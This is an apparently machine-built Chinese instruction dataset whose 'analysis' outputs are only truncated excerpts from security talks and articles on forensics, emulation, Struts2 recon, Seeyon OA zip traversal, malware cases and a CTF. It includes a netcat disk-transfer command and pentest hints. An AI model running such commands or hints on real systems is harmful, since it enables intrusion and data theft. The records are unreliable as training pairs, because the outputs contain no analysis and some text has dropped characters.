{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 磁盘取证 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **简介** 一般来说取证就是收集并分析证据并为司法行动中的展示构建事实的一个过程但在计算机技术中或在计算机取证技术中取证就是通过专门的技术来发现证据的过程这些证据可被用于确认计算机计算机网络相关设备数据存储媒体是否被用于实施犯罪或未授权的活动在计算机的取证领域中取证人员在取证调查的整个过程中证明证据媒体没有在任何方面被篡改是至关重要的其中一种方法是对原始的证据媒体作一个映象复制并对映象复制品展开调查以防止对原始证据的任何更改 **相关文章** - [Linux硬盘镜像获取与还原ddAccessData FTK Imager](https://www.cnblogs.com/17bdw/p/9094659.html) - [windows取证之镜像取证仿真步骤](https://www.codenong.com/cs106859820/) --- ## 磁盘提取 ### Linux **dd & nc** - 本地取数据 ```bash fdisk -l # 查看磁盘及分区 dd if=需要拷贝的磁盘 of=/存储目录/镜像文件 确保存储目录有足够的空间 # 获取整个磁盘镜像文件 ``` - 远程取硬盘数据 ```bash # 取证机器 B 上运行 nc -l -p 4445 | dd of=/tmp/sda2.dd # 受害机器 A 上执行传输即可完成从受害机器 A 克隆 sda 硬盘到取证机器 B 的任务 dd if=/dev/sda2 | nc 192.168.10.11 4445 ``` **[FTK Imager for Linux](https://accessdata.com/product-download)** ```bash ./ftkimager --help # 查看帮助信息 ./ftkimager --list-drives # 查看当前加载的驱动器列表 # 获取/dev/sdb 这个磁盘的 E01 模式的文件映像 ./ftkimager /dev/sdb /tmp/cyq.e01 --e01 --frag 500M --description \"cyq\" --examiner cyq # /dev/sdb 取证目标驱动器名称 # /tmp/cyq.e01 取证文件的名称和路径 # --e01 表示使用 E01 格式 # --frag 500M 表示每 500MB 分成一个文件在映象片断的大小中用户可以可以选择将映象分割为多个文件以便于在 DVD 或 FAT 文件系统中中备份 # --examiner cyq 取证操作人员的姓名简称 # --description \"cyq\" 操作说明 # dd 镜像格式是目前被最广泛使用的一种镜像格式也称成原始格式 (RAW Image)dd 镜像的优点是兼容性强目前所有磁盘镜像和分析工具都支持 dd 格式 # E01 是法证分析工具 EnCase 的一个证据文件格式较好地解决了 dd 镜像的一些不足在生成 E01 格式证据文件时会要求用户输入与调查案件相关的信息如调查人员地点机构备注等元数据这些元数据将随证据数据信息一同 存入 E01 文件中文件的每个字节都经过 32 位的 CRC 校验这就使得证据被篡改的可能性几乎为 0默认情况下分析软件自动以每 64 扇区的数据块进行校验这种方式兼顾速度和完整性两个方面的考虑获取个磁盘的 E01 模式的文件映像需要一些时间根据磁盘大小和硬件型号有所差异. ``` **xmount** - xmount 工具可以把 E01 格式的镜像文件转化为 VDI 或者 VMDK 格式然后用户可以使用 VirtualBox 和 Vmware 软件打开文件进行取证操作 ```bash rpm -ivh https://forensics.cert.org/cert-forensics-tools-release-el7.rpm yum install -y xmount groupadd fuse groupadd cyq usermod -a -G fuse cyq ``` ```diff vi /etc/fuse.conf ++ user_allow_other ``` ```bash mkdir ~/mnt0 xmount --in ewf --out vdi --cache ~/tmp/MyDisk.cache ~/tmp/cyq.E?? ~/mnt0 # --in ewf 表示源文件是 E01 格式 # -~/tmp/cyq.E?? 表示源文件的路径并且可能是多个文件 # --out", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### Unicorn引擎概述 Unicorn是一个轻量级, 多平台, 多架构的CPU模拟器框架. 我们可以更好地关注CPU操作, 忽略机器设备的差异. 想象一下, 我们可以将其应用于这些情景: 比如我们单纯只是需要模拟代码的执行而非需要一个真的CPU去完成那些操作, 又或者想要更安全地分析恶意代码, 检测病毒特征, 或者想要在逆向过程中验证某些代码的含义. 使用CPU模拟器可以很好地帮助我们提供便捷. 它的亮点(这也归功于Unicorn是基于[qemu](http://www.qemu.org)而开发的)有: * 支持多种架构: Arm, Arm64 (Armv8), M68K, Mips, Sparc, & X86 (include X86_64). * 对Windows和*nix系统(已确认包含Mac OSX, Linux, *BSD & Solaris)的原生支持 * 具有平台独立且简洁易于使用的API * 使用JIT编译技术, 性能表现优异 你可以在[Black Hat USA 2015](http://www.unicorn-engine.org/BHUSA2015-unicorn.pdf)获悉有关Unicorn引擎的更多技术细节. Github项目主页: [unicorn](https://github.com/unicorn-engine/unicorn) 尽管它不同寻常, 但它无法模拟整个程序或系统, 也不支持系统调用. 你需要手动映射内存并写入数据进去, 随后你才能从指定地址开始模拟. ### Unicorn Engine应用的情景 什么时候能够用到Unicorn引擎呢? * 你可以调用恶意软件中一些有趣的函数, 而不用创建一个有害的进程. * 用于CTF竞赛 * 用于模糊测试 * 用于gdb插件, 基于代码模拟执行的插件 * 模拟执行一些混淆代码 ### Unicorn Engine安装方式 安装Unicorn最简单的方式就是使用pip安装, 只要在命令行中运行以下命令即可(这是适合于喜爱用python的用户的安装方法, 对于那些想要使用C的用户, 则需要去官网查看文档编译源码包): ``` shell pip install unicorn ``` 但如果你想用源代码进行本地编译的话, 你需要在[下载](http://www.unicorn-engine.org/download/)页面中下载源代码包, 然后可以按照以下命令执行: * *nix 平台用户 ``` shell $ cd bindings/python $ sudo make install ``` * Windows平台用户 ``` shell cd bindings/python python setup.py install ``` 对于Windows, 在执行完上述命令后, 还需要将[下载](http://www.unicorn-engine.org/download/)页面的`Windows core engine`的所有dll文件复制到`C:\\locationtopython\\Lib\\site-packages\\unicorn`位置处. ### unicorn快速使用指南 我们将会展示如何使用python调用unicorn的api以及它是如何轻易地模拟二进制代码. 当然这里用的api仅是一小部分, 但对于入门已经足够了. ``` python 1 from __future__ import print_function 2 from unicorn import * 3 from unicorn.x86_const import * 4 5 # code to be emulated 6 X86_CODE32 = b\"\\x41\\x4a\" # INC ecx; DEC edx 7 8 # memory address where emulation starts 9 ADDRESS = 0x1000000 10 11 print(\"Emulate i386 code\") 12 try: 13 # Initialize emulator in X86-32bit mode 14 mu = Uc(UC_ARCH_X86, UC_MODE_32) 15 16 # map 2MB memory for this emulation 17 mu.mem_map(ADDRESS, 2 * 1024 * 1024) 18 19 # write machine code to be emulated to memory 20 mu.mem_write(ADDRESS, X86_CODE32) 21 22 # initialize machine", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 OLONNONS-我NL年前的技巧拿了个shell 在分析完 log4shell 对于struts2的影响后感觉struts2框架写的有点xxx由于上正好有个 struts2打 log4shell 不成功于是准备先看看其历史漏洞然后在挖挖看 在看struts2历史漏洞时发现空虚浪前辈以前挖过不少struts2的漏洞于是在他博客看了他的很多章 博客(看闭了)发现他提到的个判断struts2的法 通过在正常的Action后添加参数 ?ActionErrors=xxx 会返回404 Struts2的Action都继承 ActionSupport 0x01 前 0x01 判断struts2的法 0x02 原理分析 2  ActionSupport 存在 setActionErrors 和 getActionErrors 法可以获取到ActionErrors参 数 ActionErrors 在 struts2 中常作为户输验证当不正确时被赋值此时就不会进Action中 不进Action中意味着没有结果返回 org.apache.struts2.dispatcher.Dispatcher#serviceAction 3 proxy.execute() 因为没有结果返回会出现异常异常信息携带了此action的全类名 com.demo.action.LinkAction 最后进 sendError 通过404返回 但通过实际测试发现很多情况下并不会返回404我本地使struts-2.5.27带的struts2-showcase 进测试发现也不我在 WEB-INF/classes/struts.xml 写了个action 发现是的实际测试过程中遇到同个站有的action加这个参数200 有的action加这个404能爆出全类名有的404爆的全类名是 ActionSupport  4 有的还会把物理路径爆出来有的应该是定义了404这种法不 对于各种情况没弄清楚具体原因能有限没调试出来希望有师傅知道的能解答下 我看到这个点的时候想到的并不是struts2框架指纹判断是注意到这个404会把全类名爆出来可以 来找源码 以前做渗透遇到个只有个登录搞不进去的时候般会想着找个源码 有下种思路 1. 找个指纹扫下备份 2. 通过前端js等件的些关键词在github上搜索 3. 通过各种蛛丝迹得知此系统开发商再找源码 4. 想办法打个报错获取全类名 但是有的时候遇到的系统这些法都不通此时通过这个技巧可以获知action的全类名即可直接在 github上搜索这个全类名可以很轻松的找到源码如果找不到的话可通过全类名关联到开发商再想办法找 源码 找了个上的标站测试这个问题发现个存在这个问题 通过这个全类名在github上找代码 0x03 实际运 5 结果较多有62个选定xml件进搜索 找到份18年的代码审计过程较为简单直接的任意件上传 6", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npackage org.vulhub.shirodemo; import org.apache.shiro.authc.*; import org.apache.shiro.authz.AuthorizationInfo; import org.apache.shiro.realm.AuthorizingRealm; import org.apache.shiro.subject.PrincipalCollection; public class MainRealm extends AuthorizingRealm { @Override protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) { return null; } @Override protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException { String username = (String) authenticationToken.getPrincipal(); String password = new String((char [])authenticationToken.getCredentials()); if (username.equals(\"admin\") && password.equals(\"vulhub\")) { return new SimpleAuthenticationInfo(username, password, getName()); } else { throw new IncorrectCredentialsException(\"Username or password is incorrect.\"); } } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nthe Constructocat by Jason Costello - https://github.com/jsncostello gitDigger Creating useful wordlists from GitHub By: WiK & Mubix We suck at picturing things, so in order for this presentation to be successful you must all strip down to your underwear CENSORED The Researcher  WiK @jaimefilson We weren't the first to go digging Link to blog post Only problem is you need to find a service that is friendly to research 02:09 < pasv> http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing/ 02:11 <@WiK> nice find 02:11 < pasv> i wish i had thought of it 02:16 < mubix> Thats awesome 02:16 <@WiK> ive done similar stuff, now i have a font collection that 10gb of unique fonts 02:17 < mubix> wish they would add bitbucket, and github to their searches 02:19 <@WiK> ive looked at scrapin github.. theres no real good way to do it The 30 minute I CAN DO THIS! Solution but there is no all repos list Usernames & their repositories Import os Import urllib Import urllib2 Import sqlite3 Enter Python WGET Got it now what? Wordlists Repositories Lots of manual review and headaches But finally resulted in os.walk() sort grep awk Only the TOP repositories 17 hours of manual kung-fu to process into wordlists Betterwalk.walk() vs os.walk() Link to project Initial Thoughts The Good News I got the wordlists that I wanted and they were useful The Bad News Only the TOP repositories Sqlite3 transactions were slow 17 hours of manual labor sucks My HDD was now full Lets Get Serious (well, kinda...) FIRST PROBLEM: STORAGE Storage Options Pros Cheap ($99 USD a year) Built-in indexing Cons Windows Only Crashes OFTEN Encryption == SLOW Pros Central, local, fast storage Cons Expensive Remember Im already at 3 TB Solution SECOND PROBLEM: PYTHON WGET GITHUB API THIRD PROBLEM: SQLITE SUCKS Solution PUTTING IT ALL TOGETHER Upgrades Added 2 modes Downloader Processor Added Threading Replaced sqlite3 with mysql Upgrades  Password Table  count  name  Username Table  count  name  Emai", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Neuronumerous Group Presents: Build a Lie Detector / Beat a Lie Detector With your hosts Rain And J03b34r Introduction by: Int80 Start to Finish  History of Deception Detection  The History of the Polygraph  How We Built our DIY Polygraph  Trying to Beat the DIY Polygraph  The Data Aftermath History of Deception Detection Trial by ordeal  a primitive method of determining a person's guilt or innocence by subjecting the accused person to dangerous or painful tests believed to be under divine control Trial by combat  an ancient dispute resolution method where those in dispute would fight one another until submission or death. History of Deception Detection (cont.) Trial by torture  an act where severe pain is intentionally inflicted on a person to obtain a confession of guilt. The \"third degree\"  a euphemism used for trial by torture when used by the police. The adversarial justice system  two-sided structure under which criminal trial courts operate. History of the Polygraph 1920s  Modern polygraph developed  1930s  Polygraph starts its move into private sector 1940s to 1950s  Polygraph meets Cold War America History of the Polygraph (cont.) 1960 to 1970s  Polygraph spreads rapidly in both government and private sector 1980s  Polygraph Protection Act passed 1990s to Today  Polygraph Redux How We Built our DIY Polygraph  Gotta start somewhere  Respiratory rate  Galvanic skin response  Pulse http://courses.cit.cornell.edu/ee476/FinalProjects/ s2007/jsc59_ecl37/jsc59_ecl37/report2.html How it Works Oldgrover's Super Sweet Breathing Band Outside the Box Inside the Box Trying to Beat the DIY Polygraph  The numbers test  Breathing strategy  Biting tongue  Contracting anal sphincter muscle The Data Aftermath  What went right  Surprises and pitfalls  Future jumping of points Shoutouts and Thanks! Psychedelicbike, Oldgrover, Christian Gruber, Int80, Dead Addict, Anonymous, Brad Smith, Seth Hardy and of course the rest of the Neuronumerous group. (I love you guys!)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNicholas J. Percoco Jibran Ilyas Trustwaves SpiderLabs Agenda  About Us  How did we get the malware?  Analysis Outline  Sample A  Casino Club in Las Vegas  Sample B  Hotel in New York  Sample C  Video Poker in Lake Tahoe  Sample D  Restaurant in Michigan  Conclusions  Tools We Like  Contacts About Us Nicholas J. Percoco, Head of SpiderLabs @ Trustwave - 14 Yrs Jibran Ilyas, Senior Forensic Analyst @ Trustwave - 5 Yrs SpiderLabs is the advance security team at Trustwave responsible for incident response, penetration testing and application security tests for Trustwaves clients. SpiderLabs has responded to hundreds of security incidents, performed thousands of penetration tests and security tested hundreds of business applications for Fortune 500 organizations. How did we get the Malware? In 2008, we visited 150 different environments that were compromised via a number of different methods. Specifically, we saw a huge increase in Malware (targeted or mainstream) based attacks. The basic method of acquisition was visit the location, live analysis, memory dumps, and disk imaging. After we had a copy of the sample, it was taken back to SpiderLabs for further analysis. SpiderLabs has two physical laboratories - Chicago and London. The contents of this talk is a walk through of what found to be some of more interesting samples we have in our collection going from simple and common to rare and complex. Analysis Outline During this presentation we are going to present each case in the following way:  Architecture and Problems  What did the Target Environment look like?  Tools Found  What did the attackers leave behind?  Installation Vector  How did it end up in the Target Environment?  Static Analysis / Dynamic Analysis  A deeper look at the Malware with and without executing it.  Data Exfiltration / Propagation  What damage did it do?  Live Demo  The malware in action - live in a VM environment. Sample A: Casino Club in Las Vegas Firewall (Allowing RDP  Port 3389) Back of H", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHackers and Disasters: How To Reboot Society With Style On A Budget Brad RenderMan Haines Hacker / Security Consultant RenderLab.net, Churchofwifi.org, NMRC.org render@renderlab.net Defcon 17 July 31st  August 2nd, 2009 Las Vegas, Nevada http://www.renderlab.net/projects/presentations So You Survived The Apocalypse Good For You Now What? Inspiration  Visited Oslo for Hackcon 2008  First time in a country that had been occupied  Visited the resistance museum in Oslo  Zack pointed out his phone compared to home build radios in the display  One photo in particular stood out: April 9, 1940 February 7, 2008 Inspiration  Norwegian Resistance in WW2  Hackers to the bone  Survived long periods off grid, hiding from a lethal, roaming enemy  Built their own equipment, radios, weapons  Highly effective  Modern urban dwellers  Utterly fail to understand most devices they own  Turn into piles of goo during Blackberry outages  No one repairs things anymore Inspiration  What would I do in case of invasion?  Answer wasn't confidence boosting  Looking at others wasn't helping either  Idea mulled around for a while till watching 'Dawn of the Dead' while drunk  I'd be useless in the zombie apocalypse  How can I make myself more useful?  How can I help short cut rebuilding?  Can I do it without getting weird? Inspiration  Treat it as a hacker problem  Disaster planning and recovery on a planetary level  Business continuity on a global scale  Hackerspaces a natural learning/teaching ground  What if? Is not a bad thing to ask about anything  Motivated after losing massive amounts of data  Urban-survivalists not much help Side Note: The Colony  New show on Discovery  Talk started long before production  Good to see the topic getting attention  Seems very controlled and contrived Side Note: The Colony  Can't accurately represent end-of-the- world  Can't kill marauders  It's a TV show, there's only so much they can do/show  There's a camera guy standing there! Disasters  Large or small, the", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNetwork Mathematics - Why is it a Small World? Oskar Sandberg 1 Networks Formally, a network is a collection of points and connections between them. 2 Networks Formally, a network is a collection of points and connections between them. This is an abstraction which can be used to describe a lot of different systems (technical, physical, biological, sociological, etc. etc.). 2 Networks Math Graph Vertex Edge CS Network Node Link Physics System Site Bond Sociology Social Network Actor Tie Individual Friendship WWW Webpage Link (d) Internet Site Connection Network Bridge Road System Crossing Road 3 Definition and Types G = (V,E) 4 Definition and Types G = (V,E) V is a set (collection) of vertices. 4 Definition and Types G = (V,E) V is a set (collection) of vertices. E is a set of edges (pairs (u,v) where u,v  V). 4 Definition and Types G = (V,E) V is a set (collection) of vertices. E is a set of edges (pairs (u,v) where u,v  V). Structured and designed: Corporate LANs, telephone networks. 4 Definition and Types G = (V,E) V is a set (collection) of vertices. E is a set of edges (pairs (u,v) where u,v  V). Structured and designed: Corporate LANs, telephone networks. Randomly evolved: The Web, social networks. 4 Definition and Types G = (V,E) V is a set (collection) of vertices. E is a set of edges (pairs (u,v) where u,v  V). Structured and designed: Corporate LANs, telephone networks. Randomly evolved: The Web, social networks. Somewhere in between: The Internet, P2P Networks. 4 Network Mathematics The questions depend on the type of network. 5 Network Mathematics The questions depend on the type of network. When designing structured networks, questions are usually algorithmic. (How do I create a network with this property?) 5 Network Mathematics The questions depend on the type of network. When designing structured networks, questions are usually algorithmic. (How do I create a network with this property?) When studying randomly generated networks questions tend to analytic. (", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 WO IN THE UNITED STATES DISTRICT COURT FOR THE DISTRICT OF ARIZONA MDY Industries, LLC, Plaintiff/Counterdefendant, vs. Blizzard Entertainment, Inc.; and Vivendi Games, Inc., Defendants/Counterclaimants. __________________________________ Blizzard Entertainment, Inc.; and Vivendi Games, Inc., Third-Party Plaintiffs, vs. Michael Donnelly, Third-Party Defendant. ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) No. CV-06-2555-PHX-DGC ORDER Blizzard Entertainment, Inc. and Vivendi Games, Inc. (collectively, Blizzard) are the creators and operators of a multiplayer online role-playing game known as World of Warcraft (WoW). WoW was released in November of 2004. WoW players control characters within a virtual universe, exploring the landscape, fighting monsters, performing 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 1 The record contains several different versions of the EULA and TOU. The parties agreed at oral argument that the most recent versions  the February 2, 2007 EULA and the October 16, 2006 TOU  are the operative agreements for purposes of the summary judgment motions. See Dkt. #41-8, 42. The Court therefore will not address the earlier versions. - 2 - quests, building skills, and interacting with other players and computer-generated characters. As players succeed, they acquire in-game assets, experience, and power. Players can advance from level 1 to level 60 with the basic game, and through level 70 with an expansion module. Blizzard owns the copyright for WoW software. The software consists of two components: the game client software and the game server software. A user can obtain the game client software by purchasing a copy at a retail store or downloading a copy from the WoW website. The user plays WoW by loading the game client software on his personal computer and accessing the game server software through an online account for which he pays a mo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n上午发了篇致远OA的漏洞分析 有位师傅说有坑确实这个坑还能影响不少 问题在哪 ZipUtil.unzip(zipFile, unzipDirectory); 就在于这个ZipUtil有位师傅可能也尝试跟我样写demo去复现会发现个错 误 Entry is outside of the target dir 这样需要注意下版本问题版本问题版本问题重要的事情说三遍 只有 seeyon-ctp-core.jar 的修改时间为 2018-05-24 才能使../去跨随机成的 uuid录 于此修改时间就会爆出上的错误 然后最终的解压为: /seeyon/common/designer/pageLayout/压缩包的件名 这的成器可以参考塔王的 https://www.o2oxy.cn/3394.html 总的来说危害不是很只适合低版本s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n企业安全架构概述 An Introduction of Enterprise Security Architecture 北海之帝为忽南海之帝为倏中央 之帝为混沌忽与倏时相与遇于混沌之地 混沌待之甚善忽与倏谋报混沌之德曰 人皆有七窍以视听食息此独无有尝 试凿之日凿一窍七日而混沌死 -- 庄子.应帝王 一些问题 什么是企业安全架构 几种常见模型 企业安全架构实践 企业安全建设中的一些问题  如何保证与战略和业务一致性  如何体现价值交付  如何评估投入产出  大系统的复杂度  一处失效全盘皆输  如何避免重复投入  管理和技术脱节  技术应用和运维失效 系统论与系统工程 SYSTEM APPROACH AND SYSTEM ENGINEERING 万事万物皆为系统 系统的定义由若干要素以一定结构形式联结构 成的具有某种功能的有机整体在这个定义中包 括了系统要素结构功能四个概念 整体性结构性关联性动态平衡性时序性 系统工程通过系统解析的方法分析要素与要 素要素与系统系统与环境三方面的关系优 化解决问题 组织战略(Why) 方针策略(What) 组织架构Who 标准指南(How) 战略 方针策略 组织架构岗位职责 基线标准操作手册维护流程 控制活动运行记录 控制措施(WhenWhere) 企业架构管理体系与企业安全架构 EA, ISMS AND ESA 企业架构 (Enterprise Architecture)  企业架构是构成组织的所有关键元素和关系的综合描述企业架构框架EAF是一个描述企业架 构方法的蓝图一种通过系统工程综合全面的解析企业要素和关系并改善问题的实践性方法 分层结构 企业业务架构EBAEnterprise Business Architecture组织结构岗位职能和业务流程 企业信息架构EIAEnterprise Information Architecture数据结构和关系 企业应用架构EAAEnterprise Application Architecture应用系统 企业技术架构ETAEnterprise Technical Architecture 基础设施  ZAF: Zachman Framework  TOGAF: The Open Group Architecture Framework  FEAF: The Federal Enterprise Architecture Framework  DoDAF: The Department of Defense Architecture Framework 范例ZACHMAN FRAMEWORK Based on work by John A. Zachman VA Enterprise Architecture DATA What FUNCTION How NETWORK Where PEOPLE Who TIME When MOTIVATION Why DATA What FUNCTION How NETWORK Where PEOPLE Who TIME When MOTIVATION Why SCOPE (CONTEXTUAL) Planner ENTERPRISE MODEL (CONCEPTUAL) Owner SYSTEM MODEL (LOGICAL) Designer TECHNOLOGY MODEL (PHYSICAL) Builder DETAILED REPRESENTATIONS (OUT-OF-CONTEXT) Sub-Contractor FUNCTIONING ENTERPRISE SCOPE (CONTEXTUAL) Planner ENTERPRISE MODEL (CONCEPTUAL) Owner SYSTEM MODEL (LOGICAL) Designer TECHNOLOGY MODEL (PHYSICAL) Builder DETAILED REPRESENTATIONS (OUT-OF-CONTEXT) Sub-Contractor FUNCTIONING ENTERPRISE Things Important to the Business Entity = Class of Business Thing Processes Performed Function = Class of Business Process Semantic Model Ent = Business Entity Rel = Business Relationship Business Process Model Proc = Business Process I/O = Business Resources Busine", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n##4w1h (misc, 100p) `Hint! The flag is made up of the direction each image is looking in, like 9447{NWSE}` ###PL [ENG](#eng-version) Dostajemy w zadaniu 10 obrazów i zgodnie z podpowiedzią mamy sprawdzić w jakim kierunku patrzy kamera która robiła dane zdjęcie. ![](img/0.png) https://www.google.pl/maps/@-22.9578184,-43.2061834,3a,75y,320.83h,104.41t/data=!3m6!1e1!3m4!1sTb-FwFIg4x6lhjWEBHbLbQ!2e0!7i13312!8i6656 NW ![](img/1.png) https://www.google.pl/maps/@1.2890586,103.8542089,3a,75y,171.52h,90.31t/data=!3m6!1e1!3m4!1sabxkNWrPgqE6p_8s8QZLnQ!2e0!7i13312!8i6656 S ![](img/2.png) https://www.google.pl/maps/@-33.8576596,151.209252,3a,44.5y,8.57h,91.35t/data=!3m6!1e1!3m4!1sM6Art2b882XlIU7EEphbmw!2e0!7i13312!8i6656 N ![](img/3.png) https://www.google.pl/maps/@43.0836224,-79.077298,3a,75y,141.49h,73.97t/data=!3m6!1e1!3m4!1siL1i6KTNVw0j8BXMH_CnlA!2e0!7i13312!8i6656!6m1!1e1 SE ![](img/4.png) https://www.google.pl/maps/@38.8893105,-77.0328766,3a,75y,277.92h,89.09t/data=!3m6!1e1!3m4!1sGXxnHvvXIh9ZIcV1gfjbxA!2e0!7i13312!8i6656!6m1!1e1 W ![](img/5.png) https://www.google.pl/maps/@48.8611422,2.3341197,3a,75y,48.8h,85.07t/data=!3m6!1e1!3m4!1spi8i58rsnwwXFC_3_3Ko6w!2e0!7i13312!8i6656!6m1!1e1 NE ![](img/6.png) https://www.google.pl/maps/@59.9398238,30.3155033,3a,75y,313.41h,100.58t/data=!3m6!1e1!3m4!1smTEhn-Y1rbv3orgeV5DbNw!2e0!7i13312!8i6656 NW ![](img/7.png) https://www.google.pl/maps/@41.882726,-87.6225599,3a,75y,273.93h,89.85t/data=!3m6!1e1!3m4!1sQZFXb5I7gYZegqvmi7kYOQ!2e0!7i13312!8i6656 W ![](img/8.png) https://www.google.pl/maps/@37.5750684,126.9768249,3a,75y,0.59h,85.8t/data=!3m6!1e1!3m4!1snQzQJfkLNSVcHQizsrBV2g!2e0!7i13312!8i6656!6m1!1e1 N ![](img/9.jpg) Zdjęcie bieguna południowego więc S `9447{NWSNSEWNENWWNS}` ### ENG version We get 10 pictures and according to hint we need to check the direction in which the camera is pointing. ![](img/0.png) https://www.google.pl/maps/@-22.9578184,-43.2061834,3a,75y,320.83h,104.41t/data=!3m6!1e1!3m4!1sTb-FwFIg4x6lhjWEBHbLbQ!2e0!7i13312!8i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ntypedef unsigned char undefined; typedef unsigned int ImageBaseOffset32; typedef unsigned char bool; typedef unsigned char byte; typedef unsigned int dword; float10 typedef long long longlong; typedef unsigned char uchar; typedef unsigned int uint; typedef unsigned long ulong; typedef unsigned long long ulonglong; typedef unsigned char undefined1; typedef unsigned short undefined2; typedef unsigned int undefined4; typedef unsigned long long undefined8; typedef unsigned short ushort; typedef short wchar_t; typedef unsigned short word; typedef union IMAGE_RESOURCE_DIRECTORY_ENTRY_DirectoryUnion IMAGE_RESOURCE_DIRECTORY_ENTRY_DirectoryUnion, *PIMAGE_RESOURCE_DIRECTORY_ENTRY_DirectoryUnion; typedef struct IMAGE_RESOURCE_DIRECTORY_ENTRY_DirectoryStruct IMAGE_RESOURCE_DIRECTORY_ENTRY_DirectoryStruct, *PIMAGE_RESOURCE_DIRECTORY_ENTRY_DirectoryStruct; struct IMAGE_RESOURCE_DIRECTORY_ENTRY_DirectoryStruct { dword OffsetToDirectory; dword DataIsDirectory; }; union IMAGE_RESOURCE_DIRECTORY_ENTRY_DirectoryUnion { dword OffsetToData; struct IMAGE_RESOURCE_DIRECTORY_ENTRY_DirectoryStruct IMAGE_RESOURCE_DIRECTORY_ENTRY_DirectoryStruct; }; typedef struct _s__RTTIBaseClassDescriptor _s__RTTIBaseClassDescriptor, *P_s__RTTIBaseClassDescriptor; typedef struct TypeDescriptor TypeDescriptor, *PTypeDescriptor; typedef struct PMD PMD, *PPMD; typedef struct _s__RTTIClassHierarchyDescriptor _s__RTTIClassHierarchyDescriptor, *P_s__RTTIClassHierarchyDescriptor; typedef struct _s__RTTIClassHierarchyDescriptor RTTIClassHierarchyDescriptor; typedef int ptrdiff_t; typedef struct _s__RTTIBaseClassDescriptor RTTIBaseClassDescriptor; struct TypeDescriptor { void * pVFTable; void * spare; char[0] name; }; struct PMD { ptrdiff_t mdisp; ptrdiff_t pdisp; ptrdiff_t vdisp; }; struct _s__RTTIBaseClassDescriptor { struct TypeDescriptor * pTypeDescriptor; // ref to TypeDescriptor (RTTI 0) for class dword numContainedBases; // count of extended classes in BaseClassArray (RTTI 2) struct PMD where; // member dis", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright (c) 1990, 1993 .\\\" The Regents of the University of California. All rights reserved. .\\\" .\\\" Redistribution and use in source and binary forms, with or without .\\\" modification, are permitted provided that the following conditions .\\\" are met: .\\\" 1. Redistributions of source code must retain the above copyright .\\\" notice, this list of conditions and the following disclaimer. .\\\" 2. Redistributions in binary form must reproduce the above copyright .\\\" notice, this list of conditions and the following disclaimer in the .\\\" documentation and/or other materials provided with the distribution. .\\\" 3. All advertising materials mentioning features or use of this software .\\\" must display the following acknowledgement: .\\\" This product includes software developed by the University of .\\\" California, Berkeley and its contributors. .\\\" 4. Neither the name of the University nor the names of its contributors .\\\" may be used to endorse or promote products derived from this software .\\\" without specific prior written permission. .\\\" .\\\" THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND .\\\" ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE .\\\" IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE .\\\" ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE .\\\" FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL .\\\" DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS .\\\" OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) .\\\" HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT .\\\" LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY .\\\" OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF .\\\" SUCH DAMAGE. .\\\" .\\\" .\\\" This tutorial sampler invokes every macro in the package several .\\\" times and is guaranteed to give a worst case performance .\\\" for an already extremely", "category": "text_analysis", "source": "security_papers"}
